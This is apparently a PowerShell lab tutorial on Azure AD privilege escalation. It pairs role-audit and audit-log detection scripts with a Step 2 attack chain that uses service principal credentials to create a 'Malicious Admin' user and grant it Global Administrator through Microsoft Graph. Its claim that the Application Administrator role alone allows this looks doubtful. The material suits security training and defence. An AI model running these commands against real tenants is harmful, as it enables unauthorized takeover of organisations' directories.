Azure AD Privilege Escalation
Learn how to identify and exploit common Azure AD misconfigurations to escalate privileges.
Lab Objectives
- Understand common Azure AD misconfigurations
- Learn to identify privilege escalation paths
- Exploit vulnerabilities to escalate privileges
- Implement mitigation strategies
Prerequisites
- Basic understanding of Azure AD concepts
- Familiarity with PowerShell
- Access to an Azure test environment
Lab Steps
Step 1: Identifying Vulnerable Service Principals
In this step, we'll use PowerShell to identify service principals with overly permissive rights. First, connect to your Azure AD tenant using the Azure AD PowerShell module:

```powershell
Connect-AzureAD
```

Then run the following to list every service principal that holds one of the high-privilege directory roles. The pipeline keeps the service principal's name next to each role it holds, so the output tells you which principal is affected (the bare membership query on its own only lists roles):

```powershell
# Role template IDs: Global Administrator, User Administrator
$privilegedRoleTemplateIds = @('62e90394-69f5-4237-9190-012177145e10', 'fe930be7-5e62-47db-91af-98c3a49a38b1')

# -All $true: without it the cmdlet returns only the first page of service principals
Get-AzureADServicePrincipal -All $true | ForEach-Object {
    $sp = $_
    Get-AzureADServicePrincipalMembership -ObjectId $sp.ObjectId |
        Where-Object { $_.ObjectType -eq 'Role' -and $_.RoleTemplateId -in $privilegedRoleTemplateIds } |
        Select-Object @{ n = 'ServicePrincipal'; e = { $sp.DisplayName } }, @{ n = 'AppId'; e = { $sp.AppId } }, @{ n = 'Role'; e = { $_.DisplayName } }
}
```

Analyze the output to identify any service principals with unnecessary high-privilege roles.
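The AzureAD module used above is deprecated, so as an added example (not part of the lab) here is the same audit written against the Microsoft Graph PowerShell SDK. It resolves role names to role definition IDs at run time instead of hard-coding template IDs, walks every active directory role assignment, and reports only the assignments whose principal is a service principal. It assumes the Microsoft.Graph modules are installed, that the caller can consent to RoleManagement.Read.Directory and Application.Read.All, and that the function name Find-PrivilegedServicePrincipalAssignment and the role watch list are this example's own choices.

```powershell
# Added example: audit directory role assignments held by service principals
# with the Microsoft Graph PowerShell SDK (Microsoft.Graph.Identity.Governance,
# Microsoft.Graph.DirectoryObjects). Not part of the original lab.

# Roles treated as high-privilege; matched by display name, resolved to IDs below.
$watchedRoleNames = @(
    'Global Administrator',
    'Privileged Role Administrator',
    'User Administrator',
    'Application Administrator',
    'Cloud Application Administrator'
)

function Find-PrivilegedServicePrincipalAssignment {
    param([string[]] $RoleNames = $watchedRoleNames)

    Connect-MgGraph -Scopes 'RoleManagement.Read.Directory', 'Application.Read.All' | Out-Null

    # Map roleDefinitionId -> displayName for the roles we care about.
    $roleById = @{}
    Get-MgRoleManagementDirectoryRoleDefinition -All |
        Where-Object { $_.DisplayName -in $RoleNames } |
        ForEach-Object { $roleById[$_.Id] = $_.DisplayName }

    # Walk every active assignment and keep those whose principal is a service principal.
    Get-MgRoleManagementDirectoryRoleAssignment -All |
        Where-Object { $roleById.ContainsKey($_.RoleDefinitionId) } |
        ForEach-Object {
            $assignment = $_
            $principal = Get-MgDirectoryObject -DirectoryObjectId $assignment.PrincipalId -ErrorAction SilentlyContinue
            if ($principal -and $principal.AdditionalProperties['@odata.type'] -eq '#microsoft.graph.servicePrincipal') {
                [pscustomobject]@{
                    ServicePrincipal = $principal.AdditionalProperties['displayName']
                    AppId            = $principal.AdditionalProperties['appId']
                    Role             = $roleById[$assignment.RoleDefinitionId]
                    # '/' means tenant-wide; anything else is an administrative unit or app scope.
                    Scope            = $assignment.DirectoryScopeId
                    AssignmentId     = $assignment.Id
                }
            }
        }
}

Find-PrivilegedServicePrincipalAssignment | Sort-Object Role, ServicePrincipal | Format-Table -AutoSize
```

Every row in the output is a finding to justify or remove: a service principal rarely needs a tenant-wide directory role, and the AssignmentId is what you pass to Remove-MgRoleManagementDirectoryRoleAssignment once the owner confirms it is not required.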
Step 2: Exploiting Misconfigured Role Assignments
Now that we've identified vulnerable service principals, let's exploit a misconfigured role assignment. For this example, we'll assume we've found a service principal with the Application Administrator role.

1. Use the service principal's credentials to authenticate (the token endpoint expects the form fields grant_type, scope, client_id and client_secret):

```powershell
$clientId     = 'vulnerable-sp-client-id'
$clientSecret = 'vulnerable-sp-client-secret'
$tenantId     = 'your-tenant-id'

$tokenBody = @{
    grant_type    = 'client_credentials'
    scope         = 'https://graph.microsoft.com/.default'
    client_id     = $clientId
    client_secret = $clientSecret
}
$tokenResponse = Invoke-RestMethod -Uri "https://login.microsoftonline.com/$tenantId/oauth2/v2.0/token" -Method POST -Body $tokenBody
$token = $tokenResponse.access_token
```

2. Use the acquired token to create a new admin account (Graph requires mailNickname as well as the fields shown in the original request):

```powershell
$newAdminBody = @{
    accountEnabled    = $true
    displayName       = 'Malicious Admin'
    mailNickname      = 'MaliciousAdmin'
    userPrincipalName = '[email protected]'
    passwordProfile   = @{
        forceChangePasswordNextSignIn = $false
        password                      = 'SuperSecurePassword123!'
    }
} | ConvertTo-Json
Invoke-RestMethod -Headers @{ Authorization = "Bearer $token" } -Uri 'https://graph.microsoft.com/v1.0/users' -Method POST -Body $newAdminBody -ContentType 'application/json'
```

3. Assign the Global Administrator role to the new account. The lookup URL is built in a double-quoted string with the $filter sigil escaped so that the inner single quotes around the UPN survive:

```powershell
$globalAdminRoleId = '62e90394-69f5-4237-9190-012177145e10'
$upn = '[email protected]'
$lookupUri = "https://graph.microsoft.com/v1.0/users?`$filter=userPrincipalName eq '$upn'"
$newAdminId = (Invoke-RestMethod -Headers @{ Authorization = "Bearer $token" } -Uri $lookupUri -Method GET).value.id

$roleAssignmentBody = @{
    principalId      = $newAdminId
    roleDefinitionId = $globalAdminRoleId
    directoryScopeId = '/'
} | ConvertTo-Json
Invoke-RestMethod -Headers @{ Authorization = "Bearer $token" } -Uri 'https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments' -Method POST -Body $roleAssignmentBody -ContentType 'application/json'
```

You have now successfully exploited the misconfigured role assignment to create a new Global Administrator account.
Step 3: Mitigation and Best Practices
To prevent privilege escalation attacks in Azure AD, implement the following best practices:

1. Regularly audit and review service principal permissions
2. Implement the principle of least privilege for all accounts and service principals
3. Use Privileged Identity Management (PIM) for just-in-time role activation
4. Enable and configure Conditional Access policies
5. Implement strong authentication methods, including Multi-Factor Authentication (MFA)
6. Monitor and alert on suspicious activities using Azure AD logs and Microsoft Cloud App Security
7. Regularly conduct security assessments and penetration tests on your Azure AD environment

By following these best practices, you can significantly reduce the risk of privilege escalation attacks in your Azure AD environment.
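Item 6 is where the attack chain from Step 2 becomes visible: both the user creation and the role assignment land in the Azure AD audit log with the service principal as the initiator. As an added example (not part of the lab), the script below runs that detection over audit log entries in the shape returned by the Graph auditLogs/directoryAudits endpoint. It flags any service principal that adds a member to a watched role, and raises the severity when the same service principal created that very user shortly before. The entries, the function name Find-ServicePrincipalRoleAbuse, the role watch list and the 60-minute window are this example's own constructed choices.

```powershell
# Added example: detect "service principal creates a user, then grants it a
# privileged role" in Azure AD audit log entries. Not part of the original lab.

$watchedRoles = @('Global Administrator', 'Privileged Role Administrator', 'User Administrator')

function Find-ServicePrincipalRoleAbuse {
    param(
        [Parameter(Mandatory)] [object[]] $Entries,
        [string[]] $WatchedRoles = $watchedRoles,
        [int] $WindowMinutes = 60
    )

    # Index successful user creations by (initiating service principal, created user id).
    $created = @{}
    foreach ($e in $Entries) {
        if ($e.activityDisplayName -eq 'Add user' -and $e.initiatedBy.app -and $e.result -eq 'success') {
            $key = '{0}|{1}' -f $e.initiatedBy.app.servicePrincipalId, $e.targetResources[0].id
            $created[$key] = [datetime]$e.activityDateTime
        }
    }

    foreach ($e in $Entries) {
        # Only role additions performed by an app (not an interactive user) are of interest here.
        if ($e.activityDisplayName -ne 'Add member to role' -or -not $e.initiatedBy.app) { continue }

        $target   = $e.targetResources[0]
        $roleProp = $target.modifiedProperties | Where-Object { $_.displayName -eq 'Role.DisplayName' }
        $role     = if ($roleProp) { $roleProp.newValue.Trim('"') } else { $null }   # newValue is a JSON string literal
        if ($role -notin $WatchedRoles) { continue }

        $spId = $e.initiatedBy.app.servicePrincipalId
        $when = [datetime]$e.activityDateTime
        $key  = '{0}|{1}' -f $spId, $target.id

        # Chain check: did this same app create the target user within the window?
        $chained = $false
        if ($created.ContainsKey($key)) {
            $delta   = ($when - $created[$key]).TotalMinutes
            $chained = ($delta -ge 0) -and ($delta -le $WindowMinutes)
        }

        [pscustomobject]@{
            Time               = $when
            Severity           = if ($chained) { 'High' } else { 'Medium' }
            ServicePrincipal   = $e.initiatedBy.app.displayName
            ServicePrincipalId = $spId
            Target             = $target.userPrincipalName
            Role               = $role
            Reason             = if ($chained) { 'App created this user and then granted it a privileged role' } else { 'App granted a privileged role' }
        }
    }
}

# Constructed sample entries: one app creates a user and promotes it three minutes
# later; a human admin's role change on a different user is included as benign noise.
$sampleJson = @'
[
  { "activityDateTime": "2024-05-01T10:00:00Z", "activityDisplayName": "Add user", "result": "success",
    "initiatedBy": { "app": { "servicePrincipalId": "11111111-1111-1111-1111-111111111111", "displayName": "build-pipeline-sp" } },
    "targetResources": [ { "id": "aaaaaaaa-0000-0000-0000-000000000001", "userPrincipalName": "new.admin@contoso.example", "modifiedProperties": [] } ] },
  { "activityDateTime": "2024-05-01T10:03:00Z", "activityDisplayName": "Add member to role", "result": "success",
    "initiatedBy": { "app": { "servicePrincipalId": "11111111-1111-1111-1111-111111111111", "displayName": "build-pipeline-sp" } },
    "targetResources": [ { "id": "aaaaaaaa-0000-0000-0000-000000000001", "userPrincipalName": "new.admin@contoso.example",
      "modifiedProperties": [ { "displayName": "Role.DisplayName", "newValue": "\"Global Administrator\"", "oldValue": null } ] } ] },
  { "activityDateTime": "2024-05-01T11:30:00Z", "activityDisplayName": "Add member to role", "result": "success",
    "initiatedBy": { "user": { "userPrincipalName": "it.admin@contoso.example" } },
    "targetResources": [ { "id": "bbbbbbbb-0000-0000-0000-000000000002", "userPrincipalName": "helpdesk@contoso.example",
      "modifiedProperties": [ { "displayName": "Role.DisplayName", "newValue": "\"User Administrator\"", "oldValue": null } ] } ] }
]
'@
$entries = $sampleJson | ConvertFrom-Json

# Expected: one High-severity finding for build-pipeline-sp; the human-initiated change is ignored.
Find-ServicePrincipalRoleAbuse -Entries $entries | Format-Table -AutoSize
```

In production, feed the function the output of Get-MgAuditLogDirectoryAudit (or the AuditLogs table in Log Analytics) rather than the inline sample, and treat any Medium finding as a review item: legitimate automation that assigns directory roles should be rare and known by name.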